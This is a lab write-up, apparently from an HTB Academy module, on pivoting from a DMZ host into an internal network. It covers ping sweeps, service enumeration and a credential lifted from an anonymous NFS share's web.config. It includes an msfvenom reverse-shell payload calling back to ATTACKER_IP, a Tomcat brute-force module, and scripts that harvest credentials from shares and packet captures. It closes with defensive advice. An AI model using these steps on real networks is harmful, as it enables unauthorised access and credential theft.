🔍 Internal Information Gathering

🎯 Overview

Internal information gathering turns an external foothold (here, SSH as root on the DMZ host) into reconnaissance of the internal network: establish a pivot (SSH dynamic port forwarding or Metasploit autoroute), discover live hosts, enumerate the Active Directory infrastructure, and exploit misconfigured services such as an open NFS export to harvest credentials in preparation for lateral movement.

🔄 Pivoting Setup Methods

🔑 SSH Dynamic Port Forwarding

# Establish SSH SOCKS proxy (add -N -f to hold the tunnel open without an interactive shell)
ssh -D 8081 -i dmz01_key root@TARGET_IP

# Verify tunnel establishment (the listener is local to the attack host)
netstat -antp | grep 8081
# Output: tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN 122808/ssh

# ProxyChains configuration (ssh -D speaks both SOCKS4 and SOCKS5; a socks5 entry
# additionally allows hostname resolution through the tunnel when proxy_dns is set)
echo "socks4 127.0.0.1 8081" >> /etc/proxychains.conf

# Test connectivity: only TCP connect scans (-sT) traverse a SOCKS proxy, and -Pn
# is required because raw-socket host discovery (ICMP/ARP) bypasses proxychains
# and would leave the attack host directly
proxychains nmap -sT -Pn -p 21,22,80,8080 172.16.8.120

🎯 Metasploit Autoroute Alternative

# 1. Generate Meterpreter payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f elf > shell.elf

# 2. Transfer to target
scp -i dmz01_key shell.elf root@TARGET_IP:/tmp

# 3. Setup multi/handler
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 443
exploit

# 4. Execute payload on target
chmod +x shell.elf && ./shell.elf

# 5. Setup autoroute
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.8.0
run

🔍 Internal Host Discovery

📊 Network Scanning Approaches

# Method 1: Bash ping sweep (from pivot host; one background ping per address, replies filtered)
for i in $(seq 254); do ping 172.16.8.$i -c1 -W1 & done | grep from
# Results (reply TTL 128 is the Windows default, 64 the Linux default):
64 bytes from 172.16.8.3: icmp_seq=1 ttl=128 time=0.472 ms    # Domain Controller
64 bytes from 172.16.8.20: icmp_seq=1 ttl=128 time=0.433 ms   # Windows + NFS
64 bytes from 172.16.8.50: icmp_seq=1 ttl=128 time=0.642 ms   # Windows + Tomcat
64 bytes from 172.16.8.120: icmp_seq=1 ttl=64 time=0.031 ms   # DMZ host

# Method 2: Metasploit ping sweep
use post/multi/gather/ping_sweep
set RHOSTS 172.16.8.0/23
set SESSION 1
run

# Method 3: Nmap through ProxyChains (slow; only connect() calls traverse the proxy,
# so run -sn unprivileged, where it falls back to TCP connects to 80/443, or use
# -sT -Pn with a short port list)
proxychains nmap -sn 172.16.8.0/23
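A fuller version of Method 1, added here as an example (it is not part of the HTB Academy module): the sweep runs one background ping per address, and a parser turns the raw reply lines into a deduplicated host list with the TTL-based OS guess used in the annotations above. SAMPLE_REPLIES is a constructed sample in ping's output format so the parser can be exercised offline; the subnet prefix argument and the TTL thresholds are assumptions.

```shell
# Added example: ping sweep from the pivot plus a parser for the replies.
# Assumption: the pivot has a standard ping that accepts -c (count) and -W (timeout).

# One ping per host in the background; grep only sees reply lines and exits once
# every background ping has closed its end of the pipe.
ping_sweep() {
    prefix="$1"                                  # e.g. 172.16.8
    for i in $(seq 1 254); do
        ping -c1 -W1 "$prefix.$i" 2>/dev/null &
    done | grep 'bytes from'
}

# Turn "64 bytes from A.B.C.D: icmp_seq=1 ttl=N time=..." lines into
# "A.B.C.D N guess", one line per host. Default initial TTLs: 128 for Windows,
# 64 for Linux/Unix, 255 for many network devices. Every router hop decrements
# the value, so the guess is only firm on a directly attached segment.
classify_replies() {
    awk '
    /bytes from/ {
        ip = $4; sub(/:$/, "", ip)
        ttl = 0
        for (f = 1; f <= NF; f++) if ($f ~ /^ttl=/) ttl = substr($f, 5) + 0
        guess = "unknown"
        if (ttl > 128)      guess = "network-device"
        else if (ttl > 64)  guess = "windows"
        else if (ttl > 0)   guess = "linux/unix"
        if (!(ip in seen)) { seen[ip] = 1; print ip, ttl, guess }
    }'
}

# Constructed sample replies (not a real sweep) so the parser can run offline;
# the duplicated 172.16.8.120 line exercises the de-duplication.
SAMPLE_REPLIES='64 bytes from 172.16.8.3: icmp_seq=1 ttl=128 time=0.472 ms
64 bytes from 172.16.8.20: icmp_seq=1 ttl=128 time=0.433 ms
64 bytes from 172.16.8.50: icmp_seq=1 ttl=128 time=0.642 ms
64 bytes from 172.16.8.120: icmp_seq=1 ttl=64 time=0.031 ms
64 bytes from 172.16.8.120: icmp_seq=1 ttl=64 time=0.030 ms'

# Usage on the pivot:  ping_sweep 172.16.8 | classify_replies
# Offline run:         printf '%s\n' "$SAMPLE_REPLIES" | classify_replies
```

The parser keeps the first reply per address, so it can also be pointed at the output of a sweep that was run several times to catch hosts that missed the one-second window.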

🎯 Discovered Infrastructure

# Network topology mapping:
172.16.8.3   - Domain Controller (DNS, Kerberos, LDAP, SMB)
172.16.8.20  - Windows Server (HTTP, NFS, RDP)  
172.16.8.50  - Windows Server (SMB, RDP, Tomcat 8080)
172.16.8.120 - DMZ Host (current position)

# Service prioritization:
High: NFS (172.16.8.20) - anonymous export, potential credential exposure
Medium: Tomcat (172.16.8.50) - Manager interface, brute-force target
Low: Domain Controller (172.16.8.3) - no anonymous access; revisit once credentials are in hand

🔍 Service Enumeration Results

📊 172.16.8.3 - Domain Controller Analysis

# Port enumeration:
53/tcp   open  domain      # DNS
88/tcp   open  kerberos    # Kerberos authentication
135/tcp  open  epmap       # RPC endpoint mapper
139/tcp  open  netbios-ssn # NetBIOS session service
389/tcp  open  ldap        # LDAP
445/tcp  open  microsoft-ds # SMB
464/tcp  open  kpasswd     # Kerberos password change
593/tcp  open  ncacn_http  # RPC over HTTP
636/tcp  open  ldaps       # LDAP over SSL

# SMB NULL session attempt (user list and password policy):
proxychains enum4linux -U -P 172.16.8.3
# Result: NT_STATUS_ACCESS_DENIED for user and policy enumeration (anonymous access disabled)
# enum4linux still recovers the domain name and SID via an anonymous lsaquery:
# Domain identified: INLANEFREIGHT
# Domain SID: S-1-5-21-2814148634-3729814499-1637837074

🖥️ 172.16.8.50 - Tomcat Server Analysis

# Port enumeration:
135/tcp  open  epmap       # RPC endpoint mapper
139/tcp  open  netbios-ssn # NetBIOS session service
445/tcp  open  microsoft-ds # SMB
3389/tcp open  ms-wbt-server # RDP
8080/tcp open  http-alt     # Tomcat

# Tomcat Manager brute force attempt (run msfconsole under proxychains, or rely on
# the autoroute session above; the module's default RPORT is already 8080):
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 172.16.8.50
set STOP_ON_SUCCESS true
run
# Result: no valid credentials from the module's default wordlists (default accounts removed)

🌐 172.16.8.20 - Windows Server + NFS

# Port enumeration:
80/tcp   open  http        # DotNetNuke (DNN)
111/tcp  open  sunrpc      # RPC port mapper
135/tcp  open  epmap       # RPC endpoint mapper
139/tcp  open  netbios-ssn # NetBIOS session service
445/tcp  open  microsoft-ds # SMB
2049/tcp open  nfs         # Network File System
3389/tcp open  ms-wbt-server # RDP

# NFS share discovery:
proxychains showmount -e 172.16.8.20
# Result: /DEV01 (everyone) - anonymous access enabled

📁 NFS Share Exploitation

🔍 NFS Misconfiguration Assessment

# NFS export enumeration
showmount -e 172.16.8.20
# Output: Export list for 172.16.8.20: /DEV01 (everyone)

# Mount NFS share (from pivot host; needs root and the NFS client utilities,
# and umount /tmp/DEV01 when finished)
mkdir /tmp/DEV01
mount -t nfs 172.16.8.20:/DEV01 /tmp/DEV01

# Share content analysis
ls -la /tmp/DEV01/
# Discovered:
BuildPackages.bat
CKToolbarButtons.xml  
DNN/                    # DotNetNuke directory
WatchersNET.CKEditor.sln

🔍 Credential Discovery in Config Files

# DNN configuration analysis
cd /tmp/DEV01/DNN/
ls -la

# Key files discovered:
web.config              # Primary configuration
web.Debug.config        # Debug configuration  
web.Deploy.config       # Deployment configuration
web.Release.config      # Release configuration

# Credential extraction from web.config:
cat web.config
# Discovered credentials:
<username>Administrator</username>
<password>
    <value>D0tn31Nuk3R0ck$$@123</value>
</password>
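Reading web.config by hand works for one file; a mounted share usually holds dozens of configuration files. The following is an added example (not part of the HTB Academy module) that walks the mounted tree and pulls out the two shapes of secret a .NET web.config tends to carry: the multi-line `<password><value>…</value></password>` element seen above, and `Password=` inside a `connectionString` attribute. The mount point argument, the file-name patterns and the sample share built by `make_sample_share` (with placeholder credentials) are assumptions for an offline run, not the real /DEV01 contents.

```shell
# Added example: sweep a mounted share for credential material in .NET-style
# configuration files. Assumption: the share is mounted at the directory in $1.
hunt_config_secrets() {
    root="$1"
    find "$root" -type f \( -iname '*.config' -o -iname '*.xml' \) 2>/dev/null |
    while IFS= read -r f; do
        awk -v file="$f" '
        # remember the most recent <username> so it can be paired with the password
        /<username>/ { u = $0; gsub(/.*<username>|<\/username>.*/, "", u) }
        /<password>/ { inpw = 1 }
        inpw && /<value>/ {
            v = $0; gsub(/.*<value>|<\/value>.*/, "", v)
            printf "%s\tusername=%s\tpassword=%s\n", file, u, v
            inpw = 0
        }
        /<\/password>/ { inpw = 0 }
        # "...;User ID=x;Password=y;..." inside a connection string attribute
        tolower($0) ~ /connectionstring/ && /[Pp]assword=/ {
            p = $0; sub(/.*[Pp]assword=/, "", p); sub(/[;"].*/, "", p)
            cu = "?"
            if (match($0, /[Uu]ser [Ii][Dd]=[^;"]*/))
                cu = substr($0, RSTART + 8, RLENGTH - 8)
            printf "%s\tconnection-string user=%s password=%s\n", file, cu, p
        }' "$f"
    done
}

# Constructed sample share (not the real /DEV01 contents) for an offline run;
# every credential in it is a placeholder.
make_sample_share() {
    d=$(mktemp -d)
    mkdir -p "$d/DNN"
    cat > "$d/DNN/web.config" <<'EOF'
<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="SiteSqlServer" connectionString="Data Source=.;Initial Catalog=DNN;User ID=dnnuser;Password=Sample-Db-Pa55;" providerName="System.Data.SqlClient" />
  </connectionStrings>
  <superuser>
    <username>Administrator</username>
    <password>
      <value>Sample-Admin-Pa55</value>
    </password>
  </superuser>
</configuration>
EOF
    printf 'REM build script, nothing sensitive\n' > "$d/BuildPackages.bat"
    printf '%s\n' "$d"
}

# Usage on the pivot:  hunt_config_secrets /tmp/DEV01
# Offline run:         hunt_config_secrets "$(make_sample_share)"
```

Output is one tab-separated line per finding with the file path first, so it can be appended straight to the evidence log; the web.*.config transform files listed above match the same pattern and are searched too.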

🌐 DotNetNuke (DNN) Analysis

πŸ“Š Application Assessment

# DNN installation discovery
proxychains curl http://172.16.8.20
# Result: DNN installation page

# Admin login page access
http://172.16.8.20/Login?returnurl=%2fadmin

# User registration attempt:
# Result: "Email sent to Site Administrator for verification"
# Assessment: Manual approval required (unlikely to succeed)

# Credential validation:
Administrator:D0tn31Nuk3R0ck$$@123
# Source: NFS share web.config file

🔍 Firefox SOCKS Proxy Configuration

# Firefox proxy setup:
1. Settings → General → Network Settings
2. Manual proxy configuration
3. SOCKS Host: 127.0.0.1
4. Port: 8081
5. SOCKS v5 selected
6. Proxy DNS when using SOCKS v5: enabled

# Direct internal network access:
http://172.16.8.20 → DNN installation page
http://172.16.8.20/Login → Admin authentication portal

📑 Network Traffic Analysis

🔍 Packet Capture Setup

# Traffic monitoring from pivot host (ens192 is the pivot's internal-facing
# interface; -s 65535 keeps full frames rather than truncated headers)
tcpdump -i ens192 -s 65535 -w ilfreight_pcap

# Capture statistics:
^C2027 packets captured
2033 packets received by filter
0 packets dropped by kernel

# Analysis workflow:
1. Transfer PCAP to attack host (scp over the existing SSH access)
2. Open in Wireshark for analysis
3. Search for cleartext credentials (FTP, HTTP Basic, form logins, SNMP community strings)
4. Identify additional services/hosts that the sweeps did not reveal
5. Map network communication patterns (who talks to the DC, backup jobs, monitoring)
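Step 3 of the workflow can start on the pivot before the PCAP is even transferred. The following added example (not part of the HTB Academy module) reads `tcpdump -A` output, which prints packet payloads as ASCII with non-printable bytes shown as `.`, and flags the common cleartext credential patterns: FTP/POP3-style `USER`/`PASS`, HTTP Basic (decoded from base64) and form posts. The capture file name is the one written above; SAMPLE_ASCII is a constructed sample, and the availability of `base64` on the pivot is an assumption.

```shell
# Added example: first-pass triage of a capture for cleartext credentials on the
# pivot itself. Run as:
#   tcpdump -A -r ilfreight_pcap 2>/dev/null | triage_cleartext_creds
triage_cleartext_creds() {
    awk '
    # FTP/POP3-style login commands: "USER name" / "PASS secret". A trailing
    # "." is how tcpdump -A renders a non-printable byte such as CR.
    /^(USER|PASS) / { v = $2; sub(/[.\r]$/, "", v); print "ftp-style", $1, v; next }

    # HTTP Basic: decode the base64 "user:pass" token. The token is only
    # handed to a shell if it is clean base64, since capture content is
    # attacker-controlled.
    /^Authorization: Basic / {
        tok = $3; sub(/[.\r]$/, "", tok)
        if (tok ~ /^[A-Za-z0-9+\/=]+$/) {
            cmd = "printf %s " tok " | base64 -d"
            cmd | getline dec; close(cmd)
            print "http-basic", dec
        }
        next
    }

    # Form posts: username=...&password=... in a request body
    /(^|&)(user(name)?|login)=/ && /(pass(word|wd)?|pwd)=/ {
        u = $0; sub(/.*(user(name)?|login)=/, "", u); sub(/&.*/, "", u)
        p = $0; sub(/.*(pass(word|wd)?|pwd)=/, "", p); sub(/&.*/, "", p)
        sub(/[.\r]$/, "", p)
        print "http-form", u, p
    }'
}

# Constructed sample of tcpdump -A output (not a real capture); every
# credential in it is a placeholder. The Basic token decodes to
# "tomcat:Sample-Tc8-Pa55".
SAMPLE_ASCII='E..<..@.@.....
USER ftpadmin
PASS Sample-Ftp-Pa55
GET /manager/html HTTP/1.1
Host: 172.16.8.50:8080
Authorization: Basic dG9tY2F0OlNhbXBsZS1UYzgtUGE1NQ==
POST /Login HTTP/1.1
Host: 172.16.8.20
username=svc_build&password=Sample-Form-Pa55&remember=1'

# Offline run:  printf '%s\n' "$SAMPLE_ASCII" | triage_cleartext_creds
```

This is a triage pass, not a replacement for Wireshark: it only sees payload that tcpdump could render as text, and a credential split across two TCP segments will be missed, so anything it flags still gets confirmed in the full capture.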

📊 Network Intelligence Gathering

# Routing table analysis (reveals further subnets reachable from the pivot)
ip route
# DNS configuration (internal resolvers and search domain)
cat /etc/resolv.conf
# ARP table enumeration (hosts the pivot has recently talked to; ip neigh where net-tools is absent)
arp -a
# Network interface details (ip addr where net-tools is absent)
ifconfig -a
# Active connections (who connects to the pivot, and where it connects to)
netstat -antup

🎯 Attack Surface Assessment

πŸ”΄ High-Priority Targets

# 172.16.8.20 (DEV01):
- DNN installation (potential admin access)
- NFS misconfiguration (credential exposure)
- Development environment (likely less hardened)
- Web.config credentials discovered

# 172.16.8.3 (Domain Controller):
- Active Directory services
- Kerberos authentication
- LDAP directory services
- SMB hardened (NULL session denied)

# 172.16.8.50 (Windows Server):
- Tomcat 10 installation
- RDP services available
- SMB services present
- Authentication hardened

🟑 Secondary Targets

# Additional reconnaissance opportunities:
- Full TCP port scans on discovered hosts
- UDP service discovery
- SMB share enumeration (authenticated)
- Web application directory brute forcing
- Service version vulnerability research

🛠️ Tools & Techniques Summary

🔄 Pivoting Methods

# SSH dynamic port forwarding:
ssh -D PORT -i private_key user@target

# Metasploit autoroute:
post/multi/manage/autoroute → automatic route discovery

# ProxyChains integration:
proxychains [command] → tunnel through established SOCKS proxy

🔍 Discovery Techniques

# Host discovery:
- Bash ping sweep (fast, efficient)
- Metasploit ping_sweep module
- Nmap through ProxyChains (slow but comprehensive)

# Service enumeration:
- Static Nmap binary on pivot host
- ProxyChains Nmap from attack host
- Metasploit auxiliary modules

# Credential hunting:
- NFS share mounting and analysis
- Configuration file examination
- Network traffic capture and analysis

🎯 HTB Academy Lab

📋 Lab Solution Summary

# Internal reconnaissance chain:
1. SSH pivot setup → Dynamic port forwarding (8081)
2. ProxyChains configuration → SOCKS proxy integration
3. Host discovery → Bash ping sweep identification
4. Service enumeration → Nmap through pivot
5. NFS exploitation → Anonymous share mounting
6. Credential discovery → web.config analysis
7. Flag retrieval → /DEV01/flag.txt

# Key techniques demonstrated:
- Professional pivoting methodologies
- NFS share exploitation techniques
- Configuration file credential mining
- Internal network reconnaissance

🔍 Learning Objectives

# Technical skills:
- SSH dynamic port forwarding setup
- ProxyChains configuration and usage
- NFS share mounting and enumeration
- Configuration file analysis techniques

# Professional methodology:
- Systematic internal reconnaissance
- Service prioritization strategies
- Evidence collection standards
- Network topology mapping

# Real-world application:
- Enterprise network pivoting
- Development environment exploitation
- Credential hunting in file shares
- Active Directory preparation

🛡️ Defensive Recommendations

🔒 Network Security

# Network segmentation:
- Implement proper DMZ isolation
- Restrict internal network access
- Deploy network access controls
- Monitor east-west traffic

# Service hardening:
- Disable unnecessary NFS exports
- Implement NFS access controls
- Secure configuration file storage
- Regular credential rotation
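The first two NFS items can be checked mechanically. The following is an added example (not part of the HTB Academy module) that audits /etc/exports syntax for the conditions that made the /DEV01 export above a credential source: a wildcard client (what showmount reports as "everyone"), no_root_squash, rw to a wildcard, the insecure option, and the absence of Kerberos. The severities and the expectation of sec=krb5* are policy assumptions, not NFS requirements; both sample export files are constructed, not the real DEV01 host configuration.

```shell
# Added example: audit an exports file. Reads exports syntax from stdin and
# prints "path<TAB>severity<TAB>finding"; prints nothing for a clean file.
audit_exports() {
    awk '
    /^[ \t]*#/ || NF == 0 { next }                   # comments and blank lines
    {
        path = $1
        if (NF < 2) {
            printf "%s\tHIGH\tno client list: any host may mount it\n", path
            next
        }
        for (i = 2; i <= NF; i++) {                   # one client(opts) spec per field
            spec = $i
            client = spec; sub(/\(.*/, "", client)
            opts = ""
            if (match(spec, /\(.*\)/)) opts = substr(spec, RSTART + 1, RLENGTH - 2)
            wildcard = (client == "*" || client == "")
            if (wildcard)
                printf "%s\tHIGH\twildcard client (showmount reports it as everyone)\n", path
            if (opts ~ /(^|,)no_root_squash(,|$)/)
                printf "%s\tHIGH\tno_root_squash: a remote root keeps uid 0 on the export\n", path
            if (wildcard && opts ~ /(^|,)rw(,|$)/)
                printf "%s\tHIGH\trw to a wildcard client\n", path
            if (opts ~ /(^|,)insecure(,|$)/)
                printf "%s\tMEDIUM\tinsecure: accepts requests from unprivileged source ports\n", path
            if (opts !~ /sec=krb5/)
                printf "%s\tLOW\tAUTH_SYS only: the server trusts the uid/gid the client claims\n", path
        }
    }'
}

# Constructed samples: the exposure pattern seen in the lab, and a tightened
# equivalent that restricts the client, drops rw, squashes root and requires
# Kerberos with privacy (sec=krb5p).
WEAK_EXPORTS='/DEV01 *(rw,sync,no_root_squash)
/backups 172.16.8.0/24(rw,insecure)'

HARDENED_EXPORTS='/DEV01 172.16.8.50(ro,sync,root_squash,sec=krb5p)
/backups 172.16.8.50(rw,sync,root_squash,secure,sec=krb5p)'

# Usage:  audit_exports < /etc/exports
#         printf '%s\n' "$WEAK_EXPORTS" | audit_exports
```

Restricting the client list is the change that would have stopped the lab path: with an explicit host list the DMZ host could not have mounted /DEV01 at all, regardless of what the share contained.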

# Monitoring and detection:
- Network traffic analysis
- Unusual connection monitoring
- Privilege escalation detection
- File access auditing
